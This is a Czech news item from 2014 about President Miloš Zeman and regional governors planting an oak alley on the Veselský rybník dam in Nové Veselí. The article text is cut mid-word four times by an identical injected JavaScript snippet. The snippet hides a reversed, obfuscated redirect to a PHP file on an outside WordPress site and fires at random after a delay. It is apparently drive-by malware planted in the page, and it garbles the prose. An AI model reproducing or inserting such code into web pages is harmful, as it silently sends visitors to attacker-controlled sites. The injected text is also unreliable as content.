sázení stromů, prezident, Nové Veselí
Rainbow page separator

Hejtmani s prezidentem budou ve Veselí sázet stromy

Čtvrtek, 16. října 2014

Sázení stromů, dub

Nové Veselí / Prezident České republiky Miloš Zeman společně s hejtmany třinácti krajů v pátek před polednem na hrázi Veselského rybníka vysadí mladé duby. Akce se rovněž zúčastní Konstantin Kinský, majitel pozemku a rybníka.
Na hrázi rybníka bude za použití k té[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to příleži[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tosti pořízených rýčů zúčastněnými „dozasazeno“ patnáct již v zemi připravených mladých dubů z lesní školky rodiny Kinských. Stromy vytvoří dvouřadou alej, která bude označena pro budoucí generace.
Sázení stromů u Veselského rybníka vyšlo z vykácení [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}topolové aleje na hrázi v roce 2009. K té měl Miloš Zeman silný ci[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tový vztah, jenže staré stromy již uvnitř uhnívaly a hrozily pádem. Když se stal Zeman prezidentem, při obědě s hejtmany na stromy u rybníka přišla řeč a původně spíše v žertu se hejtmané nabídli, že mu přijedou vysadit alej novou. Prezident je vzal za slovo.